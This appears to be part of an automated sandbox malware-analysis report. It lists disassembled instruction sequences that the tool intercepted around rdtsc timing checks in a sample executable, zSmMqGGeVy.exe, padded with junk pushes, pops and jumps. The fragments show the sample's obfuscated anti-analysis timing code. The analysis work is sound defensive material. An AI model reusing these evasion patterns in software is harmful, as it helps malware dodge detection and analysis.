Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FA30D second address: 9FA37B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 jmp 00007F9DF58A6BE3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F9DF58A6BE9h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 jmp 00007F9DF58A6BE1h 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 jnp 00007F9DF58A6BDCh 0x00000026 je 00007F9DF58A6BD6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FFDD4 second address: 9FFDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 97AAE7 second address: 97AAED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 97AAED second address: 97AB04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36023h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FEB83 second address: 9FEB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FECDF second address: 9FECE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FECE5 second address: 9FECE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FECE9 second address: 9FECEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FF270 second address: 9FF276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FF7DE second address: 9FF7EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F9DF4F3602Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C1BBA second address: 9C1BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F9DF58A6BE8h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jne 00007F9DF58A6BD6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C1BE5 second address: 9C1C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+124754EEh], eax 0x00000010 lea eax, dword ptr [ebp+12478903h] 0x00000016 mov cx, dx 0x00000019 nop 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007F9DF4F36016h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C1C16 second address: 9A8F32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F9DF58A6BD8h 0x0000000f push edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edi 0x00000013 popad 0x00000014 nop 0x00000015 mov dword ptr [ebp+124754EEh], esi 0x0000001b call dword ptr [ebp+122D3242h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 jmp 00007F9DF58A6BE7h 0x00000029 jmp 00007F9DF58A6BE8h 0x0000002e pop esi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C2344 second address: 9C238B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9DF4F36028h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b mov ecx, dword ptr [ebp+122D3D9Eh] 0x00000011 nop 0x00000012 jo 00007F9DF4F36020h 0x00000018 pushad 0x00000019 jnl 00007F9DF4F36016h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 jno 00007F9DF4F36018h 0x0000002a pushad 0x0000002b jne 00007F9DF4F36016h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C2664 second address: 9C266F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9DF58A6BD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C2DC3 second address: 9A9A0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF4F36022h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 js 00007F9DF4F36016h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop esi 0x0000001a nop 0x0000001b mov di, si 0x0000001e call dword ptr [ebp+122D36BEh] 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jno 00007F9DF4F36016h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A04B34 second address: A04B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A04C97 second address: A04C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A04C9D second address: A04CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A04CA1 second address: A04CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A04CAE second address: A04CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE0h 0x00000007 je 00007F9DF58A6BD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F9DF58A6BE8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A04F94 second address: A04F99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A050DA second address: A050E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A050E3 second address: A050EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A050EF second address: A05118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9DF58A6BE9h 0x0000000b jbe 00007F9DF58A6BD6h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A081C1 second address: A081CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9DF4F36016h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A081CC second address: A081ED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9DF58A6BE7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A081ED second address: A08216 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F9DF4F36029h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A08216 second address: A08232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F9DF58A6BD6h 0x00000009 jmp 00007F9DF58A6BE1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0AD35 second address: A0AD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0AD39 second address: A0AD53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF58A6BE4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0AD53 second address: A0AD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0AD5B second address: A0AD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0AEC7 second address: A0AECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0AECB second address: A0AED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0E0AD second address: A0E0C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F9DF4F36016h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jbe 00007F9DF4F3601Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0DA91 second address: A0DAFB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9DF58A6BE4h 0x00000008 push edi 0x00000009 jbe 00007F9DF58A6BD6h 0x0000000f jmp 00007F9DF58A6BE4h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a jmp 00007F9DF58A6BE9h 0x0000001f pop ecx 0x00000020 jmp 00007F9DF58A6BE9h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0DAFB second address: A0DB11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF4F36022h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0DB11 second address: A0DB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F9DF58A6BD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A0DDEA second address: A0DDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A11D9C second address: A11DA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A11DA1 second address: A11DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jbe 00007F9DF4F36039h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A11DB2 second address: A11DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A1164A second address: A1166A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9DF4F36016h 0x0000000a pop edi 0x0000000b push ecx 0x0000000c jnp 00007F9DF4F36016h 0x00000012 jc 00007F9DF4F36016h 0x00000018 pop ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A1166A second address: A11679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A11679 second address: A1167F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A117E4 second address: A117EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F9DF58A6BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A117EE second address: A117F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A117F2 second address: A117FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A117FE second address: A11802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A11802 second address: A11806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A169E0 second address: A169E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 986657 second address: 98665B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 98665B second address: 98665F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A15D67 second address: A15D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F9DF58A6BDAh 0x0000000b jns 00007F9DF58A6BD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A15D7D second address: A15D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A15D83 second address: A15D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A15EF8 second address: A15EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A15EFF second address: A15F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A15F21 second address: A15F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A16189 second address: A161AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE9h 0x00000009 pop ecx 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A163EB second address: A163F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A1C239 second address: A1C23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A1AC05 second address: A1AC11 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9DF4F36016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C27B7 second address: 9C27C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C27C8 second address: 9C27D2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9DF4F3601Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C27D2 second address: 9C283F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F9DF58A6BD8h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov cx, 0165h 0x00000025 mov ebx, dword ptr [ebp+12478942h] 0x0000002b mov ecx, dword ptr [ebp+122D3003h] 0x00000031 add eax, ebx 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F9DF58A6BD8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d sub di, F209h 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 js 00007F9DF58A6BD6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C283F second address: 9C2849 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C2849 second address: 9C284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C284F second address: 9C289F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9DF4F36024h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9DF4F36018h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000004h 0x0000002b pushad 0x0000002c sub di, 192Ah 0x00000031 movsx edx, ax 0x00000034 popad 0x00000035 push eax 0x00000036 push ecx 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A1B4DF second address: A1B4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A1B4E5 second address: A1B4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A240A9 second address: A240BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9DF58A6BD8h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A240BB second address: A240CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F9DF4F36016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F9DF4F3601Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2222A second address: A22255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push ebx 0x0000000d js 00007F9DF58A6BD6h 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22255 second address: A22262 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22262 second address: A22279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE2h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A223F0 second address: A223F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A223F6 second address: A22403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F9DF58A6BD6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22548 second address: A2254E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2254E second address: A22552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22552 second address: A22580 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F9DF4F3601Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9DF4F36025h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A22580 second address: A22588 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2284B second address: A22851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A2303B second address: A23041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: A23E07 second address: A23E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
